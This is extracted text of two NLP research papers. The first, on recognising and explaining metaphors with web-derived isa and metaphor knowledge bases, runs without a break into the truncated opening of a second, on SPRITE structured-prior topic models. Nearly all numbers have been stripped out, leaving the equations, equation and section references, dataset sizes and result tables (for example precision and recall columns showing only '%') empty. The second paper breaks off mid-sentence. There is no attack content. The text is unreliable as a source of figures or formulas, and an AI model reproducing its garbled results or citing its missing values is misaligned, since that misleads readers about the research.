x of category hx, and p(hx|x), the typicality of category hx for in- stance x, which will be used in metaphor recogni- tion and explanation. both scores are approximated by frequencies, e.g., p(x|hx) = # of (x,hx) in hearst extraction # of hx in hearst extraction in total, Γh contains million unique isa rela- tionships, and . million unique concepts or cate- gories (the hx’s in (x,hx) pairs). the importance of big data is obvious. Γh contains millions of cat- egories and probabilistic scores for each category which enables inference for metaphor understand- ing, as we will show next. . acquiring metaphors Γm we acquire an initial set of metaphors Γm from sim- iles. a simile is a figure of speech that explicitly compares two different things using words such as “like” and “as”. for example, the sentence life is like a journey is a simile. without the word “like,” it becomes a metaphor: life is a journey. this property makes simile an attractive first target for metaphor extraction from a large corpus. we use the following syntactic pattern for extraction: 〈target〉 be/vb like [a] 〈source〉 ( ) where be denotes is/are/has been/have been, etc., vb denotes verb other than be, and 〈target〉 and 〈source〉 denote noun phrases or verb phrases. note that not every extracted pair is a metaphor. poetry is like an art matches the pattern, but it is not a metaphor because poetry is really an art. we will use Γh to clean such pairs. furthermore, due to the dataset can be found at http://probase.msra.cn/. idiosyncrasies of natural languages, it is not trivial to correctly extract the 〈target〉 and the 〈source〉 from each sentence that matches the pattern. we use a postagger and a lemmatizer on the sentences, and we develop a rule-based system that contains more than two dozen rules for extraction. for example, a rule of high-precision but low-recall is “〈target〉 must be at the beginning of a sentence or the beginning of a clause (e.g., following the word that)”. finally, from , , sentences that match the above pattern (pattern ), we obtain . million unique (x,y) pairs, and after filtering, we are left with close to million unique metaphor pairs, which form the starting point of Γm. . cleaning, expanding, and weighting Γm the simile pattern only allows us to extract some of the available metaphor pairs. to expand Γm, we use a more flexible but also noisier pattern to extract more candidate metaphor pairs from billions of sen- tences in the web corpus: 〈target〉 be [a] 〈source〉 ( ) the above “is a” pattern covers metaphors such as life is a journey. but many pairs thus extracted are not metaphors, for example, malaysia is a tropical country. that is, pairs extracted by the “is a” pat- tern contains at least two types of relations: the lit- eral isa relations and the metaphor relations. the problem is how to distinguish one from the other. in theory, the set of all isa relations, i, and the set of all metaphor relations, m, do not overlap, because by definition, the source concept and the target con- cept in a metaphor are not the same thing. thus, our intuition is the following. the pairs produced by the simile pattern, called s, is a subset of m, while the pairs extracted from the hearst pattern, called h, is also a subset of i. since m and i hardly overlap, s and h should have little overlap, too. in practice, very few people would say something like journeys such as life. figure illustrates this scenario. to verify this intuition, we randomly sampled , sentences and manually annotated them. of these sentences, contain an isa relation, of which are enclosed in a hearst’s pattern and can be extracted by the “is a” pattern. furthermore, of these sentences contain a metaphor expression, (beast, sports car)(sports car, ferrari) (vehicle, ferrari) (beast, ferrari) hearst pattern is-a relation simile pattern metaphor relation “is a” pattern figure : relations among different sets. dotted circles represent relations (ground truth). solid circles represent pairs extracted by syntactic patterns. and within the metaphors, are embedded in a simile pattern. more importantly, there is no overlap between the isa relations and metaphors (and hence the similes). in a larger scale experiment, we crawled billion sentences which match the “is a” pattern ( ) from the web corpus. from these, we extracted million unique (x,y) pairs. . % of Γh can be found in “is a” pattern pairs, while . % of Γm can be found in “is a” pattern pairs. further more, there is almost no overlap between Γh and Γm: . % of Γh can be found in Γm, and . % of Γm can be found in Γh . our goal is to use the information collected through the syntactic patterns to enrich the metaphor relations or Γm. armed with the above observations, we make two conclusions. first, the (life, journey) pair we extracted from life is a journey is more likely a metaphor since it does not appear in the set ex- tracted from hearst patterns. second, if any existing pair in Γm also appears in Γh , we can remove that pair from Γm. from the million unique (x,y) pairs we ex- tracted earlier, by filtering out low frequency pairs and those pairs in Γh , we obtain . million of fresh metaphors. this is almost times larger than initial metaphor set obtained from the simile pattern. we further expand Γm by adding metaphors derived from Γm and Γh . assume (x,y) ∈ Γm, and (x,hx) ∈ Γh , then we add (hx,y) to Γm. as an example, if (julie,sun) ∈ Γm, specifically, we randomly sample pairs of frequency , , ..., from Γm and check the precisions of each group. we filter out pairs with frequency less than to optimize the precision. then we add (person name,sun) to Γm, since (julie,person name) ∈ Γh . this enables the metaphor detection approach we describe in section . note that we ignore transitivity in the isa relations from Γh as such transitivity is not always reliable. for example, car seat is a chair, and chair is furni- ture, but car seat is not furniture. how to handle transitivity in a data driven isa taxonomy is a chal- lenging problem, and is beyond the scope here. finally, we calculate the weight of each metaphor (x,y). the weight pm(x,y) is calculated as follows: pm(x,y) = occurrences of (x,y) in isa pattern occurrences of isa pattern ( ) the weights of derived metaphors, such as (person name,sun), are calculated as follows: pm(hx,y) = ∑ (x,hx)∈Γh pm(x,y) ( ) probabilistic metaphor understanding in this paper, we consider two aspects of metaphor understanding, metaphor recognition and metaphor explanation. the latter is needed for type and metaphors where either the source or the target con- cept is implicit or missing. next, we describe a prob- abilistic approach to accomplish these two tasks. . type metaphors in a type metaphor, both the source and the tar- get concepts appear explicitly. when a sentence matches “is a” pattern (pattern ), it is a potential metaphor expression. the first noun in the pattern is the target candidate, while the second noun is the source candidate. to recognize type metaphors, we first obtain the candidate (source, target) pair from the sentence. then, we check if we have any knowledge about the (source, target) pair. intuitively, if the pair exists in the metaphor dataset Γm, then it is a metaphor. if the pair ex- ists in the is-a knowledge base Γh , then it is not a metaphor. but because Γm is far from being com- plete, if a pair exists in neither Γm nor Γh , there is a possibility that it is a metaphor we have never seen before. in this case, we reason as follows. consider a sentence such as my ferrari is a beast. assume (ferrari, beast) ∈ Γm, but (sports car, beast) ∈ Γm. note that (sports car, beast) may it- self be a derived metaphor which is added into Γm in metaphor expansion, and the original metaphor ex- tracted from the web data is (lamborghinis, beast). furthermore, from Γh , we know ferrari is a sports car, that is, (ferrari, sports car) ∈ Γh , we can then infer that ferrari to beast is very likely a metaphor mapping. specifically, let (x,y) be a pair we are concerned with. we want to compute the odds of (x,y) repre- senting a metaphor vs. a normal is-a relationship: p(x,y) −p(x,y) ( ) where p(x,y) is the probability that (x,y) forms a metaphor. now, combining the knowledge we have in Γh , we have p(x,y) = ∑ (x,hx)∈Γh p(x,hx,y) ( ) here, hx is a possible superconcept, i.e., a possible interpretation, for x. for example, if x = apple, then two highly possible interpretations are com- pany and fruit. in eq.( ), we want to aggregate on all possible interpretations (all superconcepts) of x. this is possible because of the massive size of the concept space in Γh . we can rewrite eq.( ) to the following: p(x,y) = ∑ (x,hx)∈Γh p(y|x,hx)p(x|hx)p(hx) ( ) here, p(y|x,hx) means when x is interpreted as an hx, the probability of y as a target metaphorical con- cept for hx. thus, given hx, y is independent with x, so p(y|x,hx) can be simply replaced by p(y|hx). we can then rewrite eq.( ) to: p(x,y) = ∑ (x,hx)∈Γh p(y|hx)p(x|hx)p(hx) = ∑ (x,hx)∈Γh p(hx,y)p(x|hx) ( ) it is clear p(hx,y) is simply pm(hx,y) in eq.( ) given by the metaphor dataset Γm. furthermore, p(x|hx) is the typicality of x in the hx category, and p(hx) is the prior of the category hx. both of them are available from the isa knowledge base Γh . thus, we can calculate eq.( ) using information in the two knowledge bases we have created. if the odds in eq.( ) is greater than a thresh- old δ, which is determined empirically to be δ = p (metaphor) p (isa) , we declare (x,y) as a metaphor. . context preference modeling it is more difficult to recognize metaphors when the source concept or the target concept is not explic- itly given in a sentence. in this case, we rely on the context in the sentence. given a sentence, we find metaphor candidates and the context. here, candidates are noun phrases in the sentence which can potentially be the target or the source concept of a metaphor, while context denotes words that have a grammatic dependency with the candidate. the dependency can be subject- predicate, predicate-object, or modifier-header, etc. the context can be a verb, a noun phrase, or an ad- jective which has certain preference over the target or source candidate. for example, the word horse prefers verbs such as jump, drink and eat; the word flower prefers modifiers such as red, yellow and beautiful. in this work, we focus on analyzing the prefer- ences of verbs using subject-predicate or predicate- object relation between the verb and the noun phrases. we select , most frequent verbs from the web corpus. for each verb, we construct the dis- tribution of noun phrases depend on the verb in the sentences sampled from the web corpus. the noun phrases are restricted to be those that occur in Γh . more specifically, for any noun phrase y that ap- pears in Γh , we calculate the following pr(c|y) = fr(y,c)∑ c fr(y,c) ( ) where fr(y,c) means the frequency of y and con- text c with relation r. note we can build prefer- ence distribution for context other than verbs since, in theory, r can be any relation (e.g. modifier-head relation). . type and type metaphors if a sentence contains type and type metaphors, either the source or the target concepts in the sen- this is the ratio between the number of metaphors and is-a pairs in a random sample of “is a” pattern sentences. tence is missing. for each noun phrase x and a con- text c in such a sentence, we want to know whether x is of literal or metaphoric use. it is a metaphoric use if the selectional preference of some y, which is a source or target concept of x in Γm, is larger than the selectional preference of any super-concept of x in Γh , by a factor δ. formally, there exists a y where (x,y) ∈ Γm or (y,x) ∈ Γm, such that p(y|x,c) p(h|x,c) ≥ δ, ∀(x,h) ∈ Γh. ( ) to compute ( ), we have p(y|x,c) = p(x,y,c) p(x,c) = p(x,y)p(c|x,y) p(x,c) ( ) assuming x is a target concept and y is a source concept (a type metaphor), we can obtain p(x,y) by eq.( ). furthermore, c is independent of x in a type or metaphor, since a metaphor is an unusual use of x (the target) within a given context. therefore p(c|x,y) = p(c|y), where p(c|y) is available from eq. ( ). similarly, we have p(h|x,c) = p(x,h)p(c|h) p(x,c) ( ) where p(x,h) is obtained from Γh and p(c|h) is from the context preference distribution. to explain the metaphor, or uncover the missing concept, y∗ = arg max y ∧ (y,x)∈Γm p(y|x,c) = arg max y ∧ (y,x)∈Γm p(y,x)p(c|y) as a concrete example, consider sentence my car drinks gasoline. there are two possible targets: car and gasoline. the context for both targets is the verb drink. let x = car. by eq.( ), we first find all y’s for which (car,y) ∈ Γm or (y,car) ∈ Γm. we get terms such as woman, friend, gun, horse, etc. when we calculate p(car,y) by eq.( ), we also need to find hypernyms of car in Γh , which type metaphors can be handled similarly. may include vehicle, product, asset, etc. for each candidate y, p(y|car,c) is calculated by metaphor knowledge p(x,y) and context preference p(c|yi). table shows the result. since the selectional pref- erence of horse (from Γm) is much larger than other literal uses of car, this sentence is recognized as a metaphor, and the missing source concept is horse. table : log probabilities (m: metaphor, l:literal). type yi log log log p(yi p(yi,car) p(c|yi) |car,c) l vehicle - . -∞ -∞ l product - . -∞ -∞ l asset - . -∞ -∞ m woman - . - . - . m friend - . - . - . m gun - . -∞ -∞ m horse - . - . - . ... ... ... ... ... experimental result we evaluate the performance of metaphor acquisi- tion, recognition and explanation in our system and compare it with several state-of-the-art mechanisms. . metaphor acquisition from the web corpus, we collected , , sen- tences matching the “is like a” pattern (pattern ) and we extracted , unique high quality sim- ile mappings from them. these simile mappings became the core of Γm. Γh contains , , unique isa pairs. we also collected , , , sentences matching the “is a” pattern (pattern ), from which , , unique mappings were ex- tracted. these mappings contain both metaphors and isa relations. from there, we identified , , pairs of metaphors unseen in the sim- ile set. these new metaphor pairs were added to Γm. random samples show that the precisions of the core metaphor dataset and the whole dataset are . % and %, respectively. all of the above datasets, a sample of context preference, as well as the test sets mentioned in this section can be found at http://adapt.seiee.sjtu.edu. cn/˜kzhu/metaphor. . type metaphor recognition we compare our type metaphor recognition with the method (known as kz) by krishnakumaran and zhu ( ). for sentences containing “x is a y” pat- tern, kz used wordnet to detect whether y is a hy- pernym of x. if not, then this sentence is considered a metaphor. our test set is random sentences that match the “x be a y” pattern. we label a sen- tence in the set as a metaphor if the two nouns con- nected by be do not actually have isa relation; or if they do have isa relation but the sentence expressed a strong emotion . table : type metaphor recognition precision recall f kz % % % our approach % % % the result is summarized in table . kz does not perform as well due to the small coverage of word- net taxonomy. only out of sentences con- tain a concept x that exists in wordnet and has at least one hypernym. and among these, only sen- tences contain a y which is the hypernym ancestor of x in wordnet. clearly, the bottleneck is the scale of wordnet. . type / metaphor recognition for type / metaphor recognition, we compare our results with three other methods. the first compet- ing method (called sa) employs the selectional as- sociation proposed by resnik ( ). selectional association measures the strength of the connection between a predicate (c) and a term (e) by: a(c,e) = pr(e|c) log pr(e|c) pr(e) s(c) , ( ) where s(c) = kl(pr(e|c)||pr(e)) = ∑ e pr(e|c) log pr(e|c) pr(e) given an np-predicate pair, if its sa score is less than a threshold α (set to − by empirics), then the pair is recognized as a metaphor context. for example, “this man is an animal!”. second competing method (called cp) is the con- textual preference approach (resnik, ) intro- duced in section . . to establish context prefer- ence distributions, we randomly select million sentences from the web corpus, parse each sentence using stanford parser (group, ) to obtain all subject-predicate-object triples, and aggregate the triples to get , , subject-predicate pairs and , , predicate-object pairs. the occurrences of these pairs are used as context preference. given a pair of np-predicate pair, if its context preference score is less than a threshold β (set to − by em- pirics ), then the pair is considered as metaphoric. the third competing method (called vh) is a vari- ant of our own algorithm with Γm replaced by a metaphor database derived from the slip net pro- posed by veale and hao ( ), which we call Γv h . we built a slip net containing , concept nodes associated with , distinct talking points. we consider two concepts to be metaphoric if they are at most hops apart on the slip net the choice of hops is a trade-off between precision and recall for slip net. we thus created Γv h with , , pairs of concepts. we sampled , sentences from the bnc dataset (clear, ) as follows. we prepare a list of , frequent verbs (and their different forms). for each verb, we obtain at most sentences from bnc dataset which contain this verb as a predicate. at this point, we obtain a total of , sentences and randomly sample , sentences to form a test set. each sentence in the set is then manually la- beled as being “metaphor” or “non-metaphor”. we label them according to this procedure: . for each verb, we collect the intended use, i.e., the categories of its arguments (subject or ob- ject) according to marriam webster’s dictio- nary; . if the argument of the verb in the sentence be- longs to the intended category, the sentence is labeled “non-metaphor”; . if the argument and the intended meaning form a metonymy which uses a part or an attribute to the authors didn’t specify the choice of α and β, and we pick values which optimize the performance of their algorithms. represent the whole object, the pair is labeled as “non-metaphor”; . else the sentence is labeled as “metaphor”. table : type / metaphor recognition precision recall f sa % % % cp % % % vh % % % our approach % % % the results for type and metaphor recogni- tion are shown in table . our knowledge-based ap- proach significantly outperforms the other peers by f- measure. although vh achieves a good recall, its precision is poor. this is because i) slip net con- struction makes heavy use of sibling terms on the wordnet but sibling terms are not necessarily simi- lar terms; ii) many pairs generated by slipping over the slip net are in theory related but are not com- monly uttered due to the lack of practical context. % % % % % % % % % sps ( , ] sps ( , ] sps ( , ] f s c o re sps of verbs sa cp vh our approach figure : metaphor recognition of type and fig. compares the four methods on verbs with different selectional preference strength, which indi- cates how strong a verb’s arguments are restricted to a certain scope of nouns. again, our method shows a significant advantage across the board. we explain why our approach works better us- ing the examples in table . in sentence aau , shatters is a metaphoric usage because silence is not a thing that can be broken into pieces. sa and cp scores for shatters-silence pair are high because this word combination is quite common, note that no verb has sps larger than . and hence these methods incorrectly treat it as lit- eral expression. the situation is similar with stalk- company pair in abg . on the other hand, for an , manipulate-life is considered rare com- bination and hence has low sa and cp scores and is deemed a metaphor while in reality it is a literal use. a similar case occurs for work-concur pair. in all these cases, our knowledge bases Γm and Γh are comprehensive and accurate enough to correctly identify metaphors vs. non-metaphors. on the con- trary, the metaphor database Γv h covers way too many pairs that it treats every pair as a metaphor. besides our own dataset, we also experiment on trofi example base , which consists of verbs and , sentences containing these verbs. each sentence is annotated as literal and nonliteral use of the verb. our algorithm is used to classify the sub- jects and the objects of the verbs. we use stanford dependency parser to obtain collapsed typed depen- dencies of these sentences, and for each sentence, run our algorithm to classify the subjects and objects related to the verb, if the verb acts as a predicate. results show that our approach achieves . % pre- cision but just under % in recall. the low recall is because, i) non-literal uses in the trofi dataset in- clude not only metaphor but also metonymy, irony and other anomalies; ii) our approach currently fo- cuses on subject-predicate and predicate-object de- pendencies in a sentence only, but the target verbs do not act as predicate in many of the example sen- tences; iii) the stanford dependency parser is not ro- bust enough so half of the sentences are not parsed correctly. . metaphor explanation in this experiment, we use the classic labeled metaphoric sentences from (lakoff and johnson, ). lakoff provided metaphoric mappings, and for each mapping there are about ten example sentences. in total, there are metaphoric sen- tences. among them, we focus on sentences whose metaphor is expressed by subject-predicate or predicate-object relation, as this paper focuses on verb centric context preferences. we evaluate the results of competing algorithms trofi example base is available at http://www.cs. sfu.ca/˜anoop/students/jbirke/. table : metaphor recognition for some example sentences from bnc dataset (hm: human, m: metaphor, l : literal). id sentence hm sa cp vh ours aau road-block salvo shatters bucharest’s fragile silence. m l l m m abg obstruction and protectionism do not stalk only big companies. m l l m m an but when science proposes to manipulate the life of a human baby, l m m m l ach nevertheless, recent work on mosley and the buf has concurred l m m m l about their basic unimportance. by the following labeling criteria. we consider an output (i.e. a pair of concept mapping) as a match, if the produced pair exactly matches the ground truth pair, of if the pair is subsumed by the ground truth pair. for example, the ground truth for the sentence let that idea simmer on the back burner is ideas → foods according to lakoff (lakoff and johnson, ). if our algorithm outputs idea → stew, then it is considered a match since stew belongs to the food category. an output pair is considered correct if it is not a match to the ground truth but is otherwise considered metaphoric by at least of the human judges. given a sentence, since our algorithm returns a list of possible explanations for the missing concept, ranked by the probability, we evaluate the results by three different metrics: match top : result considered correct if there is a match with the top explanation; match top : result considered correct if there is a match in the top ranked explanations; correct top : result considered correct if there is a correct in the top explanations. table : precision of metaphor explanation using differen metaphor databases match top match top correct top Γv h % % % Γm % % % comparison with slip net we compare the result of our algorithm (from section . ) against the variant which uses Γv h ob- tained in section . . table summarizes the precisions of the two al- gorithms under three different metrics. some of these sentences and the top explanations given by our algorithm are listed in table . the concept to be explained is italicized while the explanation that is a match or correct is bolded or bold-italicized, re- spectively. the explanations are ordered from left to right by the score. comparison with paraphrasing while we define metaphor explanation as a task to recover the missing noun-based concept in a source-target mapping, an alternative way to explain a metaphor (shutova, ) is to find the paraphrase of the verb in the metaphor. here we evaluate para- phrasing task on verbs in metaphoric sentence by shutova et al(shutova, ). for a metaphoric verb v in a sentence, shutova et al. select a set of verbs that probabilistically best matches grammar relations of v , and then filter out those verbs that are not related to v according to the wordnet, and eventually re-rank remaining verbs based on selec- tion association. in some sense, shutova’s work uses a similar framework as ours: first restrict the target para- phrasing set using a knowledge, then select the most proper word based on the context. the difference is that the target of (shutova, ) is the verb in sentence, while our approach focuses on the noun. to implement algorithm by shutova, we extract and count each grammar relation in billion sen- tences. these counts are used to calculate con- text matching in (shutova, ), and are also used to calculate selection association. we perform shutova’s paraphrasing on verbs in sentences, of which only finds a good paraphrases in shutova’s top results. after removing sentences which contain light verbs (e.g., take, give, put), the algo- table : metaphor sentences explained by the system metaphor mapping sentence explanation ideas are food let that idea simmer on the back burner. stew; carrot; onion we don’t need to spoon-feed our students egg roll; acorn; word with knowledge. eyes are containers his eyes displayed his compassion. window; symbol; tiny camera his eyes were filled with anger. hollow ball; water balloon; balloon emotional effect is his mother’s death hit him hard. enemy; monster physical contact that idea bowled me over. punch; stew; onion life is a container. her life is crammed with activities. tapestry; beach; dance get the most out of life. game; journey; prison rithm finds good paraphrases in top results. one reason for the low recall is that wordnet is in- adequate in providing candidate metaphor mapping. this is also the reason why our metaphor base is better than the metaphor base generated by talking points. conclusion knowledge is essential for a machine to identify and understand metaphors in this paper, we show how to make use of two probabilistic knowledge bases au- tomatically acquired from billions of web pages for this purpose. this work currently recognizes and ex- plains metaphoric mappings between nominal con- cepts with the help of selectional preference of just subject-predicate or predicate-object contexts. an immediate next step is to extend this framework to more general contexts and a further improvement will be to identify mappings between any source and target domains. acknowledgements kenny q. zhu was partially supported by google faculty research award, and nsfc grants , and . references rodrigo agerri. . metaphor in textual entailment. in coling (posters), pages – . john barnden, sheila glasbey, mark lee, and alan wallington. . reasoning in metaphor under- standing: the att-meta approach and system. in col- ing ’ , pages – . eric p. s. baumer, james p. white, and bill tomlinson. . comparing semantic role labeling with typed dependency parsing in computational metaphor iden- tification. in calc ’ , pages – . julia birke and anoop sarkar. . a clustering ap- proach for nearly unsupervised recognition of nonlit- eral language. in in proceedings of eacl- , pages – . jeremy h. clear. . the digital word. chapter the british national corpus, pages – . charles j. fillmore, christopher r. johnson, and miriam r.l. petruck. . background to framenet. international journal of lexicography, . : – . james geary. . i is an other: the secret life of metaphor and how it shapes the way we see the world. harper. matt gedigian, john bryant, srini narayanan, and bra- nimir ciric. . catching metaphors. in in work- shop on scalable natural language understanding. stanford nlp group. . the stanford parser. http://nlp.stanford.edu/software/ lex-parser.shtml. marti a. hearst. . automatic acquisition of hy- ponyms from large text corpora. in coling ’ , pages – . paul kingsbury and martha palmer. . from tree- bank to propbank. in in language resources and evaluation. saisuresh krishnakumaran and xiaojin zhu. . hunting elusive metaphors using lexical resources. in proceedings of the workshop on computational approaches to figurative language, pages – , rochester, new york, april. acl. george lakoff and mark johnson. . metaphors we live by. university of chicago press, chicago, usa. j. h. martin. . a computational model of metaphor interpretation. academic press professional, inc. zachary j. mason. . cormet: a computational, corpus-based conventional metaphor extraction sys- tem. comput. linguist., : – , march. george a. miller. . wordnet: a lexical database for english. commun. acm, : – , november. srinivas sankara narayanan. . knowledge- based action representations for metaphor and aspect (karma). technical report. philip stuart resnik. . selection and information: a class-based approach to lexical relationships. ph.d. thesis. ekaterina shutova, lin sun, and anna korhonen. . metaphor identification using verb and noun cluster- ing. in coling ’ , pages – . ekaterina shutova. . automatic metaphor interpre- tation as a paraphrasing task. in hlt ’ , pages – . catherine smith, tim rumbell, john barnden, bob hendley, mark lee, and alan wallington. . don’t worry about metaphor: affect extraction for con- versational agents. in acl ’ , pages – . p.d. turney. . the latent relation mapping engine: algorithm and experiments. journal of artificial in- telligence research, ( ): – . tony veale and yanfen hao. . a fluid knowledge representation for understanding and generating cre- ative metaphors. in coling, pages – . yorick wilks. . making preferences more active. artificial intelligence, ( ): – . wentao wu, hongsong li, haixun wang, and kenny qili zhu. . probase: a probabilistic taxonomy for text understanding. in sigmod conference, pages – . li zhang. . metaphor interpretation and context- based affect detection. in coling (posters), pages – . sprite: generalizing topic models with structured priors michael j. paul and mark dredze department of computer science human language technology center of excellence johns hopkins university, baltimore, md mpaul@cs.jhu.edu, mdredze@cs.jhu.edu abstract we introduce sprite, a family of topic models that incorporates structure into model priors as a function of underlying components. the structured priors can be constrained to model topic hierarchies, factorizations, correlations, and supervi- sion, allowing sprite to be tailored to particular settings. we demonstrate this flexibility by constructing a sprite-based model to jointly infer topic hierarchies and author perspective, which we apply to cor- pora of political debates and online re- views. we show that the model learns in- tuitive topics, outperforming several other topic models at predictive tasks. introduction topic models can be a powerful aid for analyzing large collections of text by uncovering latent in- terpretable structures without manual supervision. yet people often have expectations about topics in a given corpus and how they should be structured for a particular task. it is crucial for the user expe- rience that topics meet these expectations (mimno et al., ; talley et al., ) yet black box topic models provide no control over the desired output. this paper presents sprite, a family of topic models that provide a flexible framework for en- coding preferences as priors for how topics should be structured. sprite can incorporate many types of structure that have been considered in prior work, including hierarchies (blei et al., a; mimno et al., ), factorizations (paul and dredze, ; eisenstein et al., ), sparsity (wang and blei, ; balasubramanyan and co- hen, ), correlations between topics (blei and lafferty, ; li and mccallum, ), pref- erences over word choices (andrzejewski et al., ; paul and dredze, ), and associations between topics and document attributes (ramage et al., ; mimno and mccallum, ). sprite builds on a standard topic model, adding structure to the priors over the model pa- rameters. the priors are given by log-linear func- tions of underlying components (§ ), which pro- vide additional latent structure that we will show can enrich the model in many ways. by apply- ing particular constraints and priors to the compo- nent hyperparameters, a variety of structures can be induced such as hierarchies and factorizations (§ ), and we will show that this framework cap- tures many existing topic models (§ ). after describing the general form of the model, we show how sprite can be tailored to partic- ular settings by describing a specific model for the applied task of jointly inferring topic hierar- chies and perspective (§ ). we experiment with this topic+perspective model on sets of political debates and online reviews (§ ), and demonstrate that sprite learns desired structures while outper- forming many baselines at predictive tasks. topic modeling with structured priors our model family generalizes latent dirichlet al- location (lda) (blei et al., b). under lda, there are k topics, where a topic is a categor- ical distribution over v words parameterized by φk. each document has a categorical distribution over topics, parameterized by θm for the mth doc- ument. each observed word in a document is gen- erated by drawing a topic z from θm, then drawing the word from φz. θ and φ have priors given by dirichlet distributions. our generalization adds structure to the gener- ation of the dirichlet parameters. the priors for these parameters are modeled as log-linear com- binations of underlying components. components are real-valued vectors of length equal to the vo- cabulary size v (for priors over word distribu- tions) or length equal to the number of topics k (for priors over topic distributions). for example, we might assume that topics about sports like baseball and football share a common prior – given by a component – with general words about sports. a fine-grained topic about steroid use in sports might be created by combining com- ponents about broader topics like sports, medicine, and crime. by modeling the priors as combina- tions of components that are shared across all top- ics, we can learn interesting connections between topics, where components provide an additional latent layer for corpus understanding. as we’ll show in the next section, by imposing certain requirements on which components feed into which topics (or documents), we can induce a variety of model structures. for example, if we want to model a topic hierarchy, we require that each topic depend on exactly one parent compo- nent. if we want to jointly model topic and ide- ology in a corpus of political documents (§ ), we make topic priors a combination of one component from each of two groups: a topical component and an ideological component, resulting in ideology- specific topics like “conservative economics”. components construct priors as follows. for the topic-specific word distributions φ, there are c(φ) topic components. the kth topic’s prior over φk is a weighted combination (with coefficient vector βk) of the c(φ) components (where component c is denoted ωc). for the document-specific topic dis- tributions θ, there are c(θ) document components. the mth document’s prior over θm is a weighted combination (coefficients αm) of the c(θ) compo- nents (where component c is denoted δc). once conditioned on these priors, the model is identical to lda. the generative story is de- scribed in figure . we call this family of models sprite: structured prior topic models. to illustrate the role that components can play, consider an example in which we are modeling re- search topics in a corpus of nlp abstracts (as we do in § . ). consider three speech-related topics: signal processing, automatic speech recognition, and dialog systems. conceptualized as a hierar- chy, these topics might belong to a higher level category of spoken language processing. sprite allows the relationship between these three topics to be defined in two ways. one, we can model that these topics will all have words in common. this is handled by the topic components – these three topics could all draw from a common “spoken lan- • generate hyperparameters: α, β, δ, ω (§ ) • for each document m, generate parameters: . θ̃mk = exp( ∑c(θ) c= αmc δck), ≤k≤k . θm ∼ dirichlet(θ̃m) • for each topic k, generate parameters: . φ̃kv = exp( ∑c(φ) c= βkc ωcv), ≤v≤v . φk ∼ dirichlet(φ̃k) • for each token (m,n), generate data: . topic (unobserved): zm,n ∼ θm . word (observed): wm,n ∼ φzm,n figure : the generative story of sprite. the difference from latent dirichlet allocation (blei et al., b) is the gen- eration of the dirichlet parameters. guage” topic component, with high-weight words such as speech and spoken, which informs the prior of all three topics. second, we can model that these topics are likely to occur together in docu- ments. for example, articles about dialog systems are likely to discuss automatic speech recognition as a subroutine. this is handled by the document components – there could be a “spoken language” document component that gives high weight to all three topics, so that if a document draw its prior from this component, then it is more likely to give probability to these topics together. the next section will describe how particular priors over the coefficients can induce various structures such as hierarchies and factorizations, and components and coefficients can also be pro- vided as input to incorporate supervision and prior knowledge. the general prior structure used in sprite can be used to represent a wide array of existing topic models, outlined in section . topic structures by changing the particular configuration of the hy- perparameters – the component coefficients (α and β) and the component weights (δ and ω) – we ob- tain a diverse range of model structures and behav- iors. we now describe possible structures and the corresponding priors. . component structures this subsection discusses various graph structures that can describe the relation between topic com- ponents and topics, and between document com- ponents and documents, illustrated in figure . (a) dense dag (b) sparse dag (c) tree (d) factored forest figure : example graph structures describing possible relations between components (middle row) and topics or documents (bottom row). edges correspond to non-zero values for α or β (the component coefficients defining priors over the document and topic distributions). the root node is a shared prior over the component weights (with other possibilities discussed in § . ). . . directed acyclic graph the general sprite model can be thought of as a dense directed acyclic graph (dag), where every document or topic is connected to every compo- nent with some weight α or β. when many of the α or β coefficients are zero, the dag becomes sparse. a sparse dag has an intuitive interpre- tation: each document or topic depends on some subset of components. the default prior over coefficients that we use in this study is a -mean gaussian distribution, which encourages the weights to be small. we note that to induce a sparse graph, one could use a -mean laplace distribution as the prior over α and β, which prefers parameters such that some components are zero. . . tree when each document or topic has exactly one par- ent (one nonzero coefficient) we obtain a two-level tree structure. this structure naturally arises in topic hierarchies, for example, where fine-grained topics are children of coarse-grained topics. to create an (unweighted) tree, we require αmc ∈ { , } and ∑ c αmc = for each docu- ment m. similarly, βkc ∈ { , } and ∑ c βkc = for each topic k. in this setting, αm and βk are indicator vectors which select a single component. in this study, rather than strictly requiring αm and βk to be binary-valued indicator vectors, we create a relaxation that allows for easier parameter estimation. we let αm and βk to real-valued vari- ables in a simplex, but place a prior over their val- ues to encourage sparse values, favoring vectors with a single component near and others near . this is achieved using a dirichlet(ρ < ) distribu- tion as the prior over α and β, which has higher density near the boundaries of the simplex. this generalizes the technique used in paul and dredze ( ), who approximated binary variables with real-valued variables in ( , ), by using a “u-shaped” beta(ρ < ) distri- for a weighted tree, α and β could be a product of two variables: an “integer-like” indicator vec- tor with sparse dirichlet prior as suggested above, combined with a real-valued weight (e.g., with a gaussian prior). we take this approach in our model of topic and perspective (§ ). . . factored forest by using structured sparsity over the dag, we can obtain a structure where components are grouped into g factors, and each document or topic has one parent from each group. figure (d) illus- trates this: the left three components belong to one group, the right two belong to another, and each bottom node has exactly one parent from each. this is a dag that we call a “factored forest” be- cause the subgraphs associated with each group in isolation are trees. this structure arises in “multi- dimensional” models like sage (eisenstein et al., ) and factorial lda (paul and dredze, ), which allow tokens to be associated with multiple variables (e.g. a topic along with a variable denot- ing positive or negative sentiment). this allows word distributions to depend on both factors. the “exactly one parent” indicator constraint is the same as in the tree structure but enforces a tree only within each group. this can therefore be (softly) modeled using a sparse dirichlet prior as described in the previous subsection. in this case, the subsets of components belonging to each fac- tor have separate sparse dirichlet priors. using the example from figure (d), the first three com- ponent indicators would come from one dirichlet, while the latter two component indicators would come from a second. . tying topic and document components a desirable property for many situations is for the topic and document components to correspond to bution as the prior to encourage sparsity. the dirichlet distri- bution is the multivariate extension of the beta distribution. each other. for example, if we think of the com- ponents as coarse-grained topics in a hierarchy, then the coefficients β enforce that topic word dis- tributions share a prior defined by their parent ω component, while the coefficients α represent a document’s proportions of coarse-grained topics, which effects the document’s prior over child top- ics (through the δ vectors). consider the example with spoken language topics in § : these three top- ics (signal processing, speech recognition, and di- alog systems) are a priori likely both to share the same words and to occur together in documents. by tying these together, we ensure that the pat- terns are consistent across the two types of com- ponents, and the patterns from both types can re- inforce each other during inference. in this case, the number of topic components is the same as the number of document compo- nents (c(φ) = c(θ)), and the coefficients (βcz) of the topic components should correlate with the weights of the document components (δzc). the approach we take (§ ) is to define δ and β as a product of two variables (suggested in § . . ): a binary mask variable (with sparse dirichlet prior), which we let be identical for both δ and β, and a real-valued positive weight. . deep components as for priors over the component weights δ and ω, we assume they are generated from a -mean gaussian. while not experimented with in this study, it is also possible to allow the components themselves to have rich priors which are functions of higher level components. for example, rather than assuming a mean of 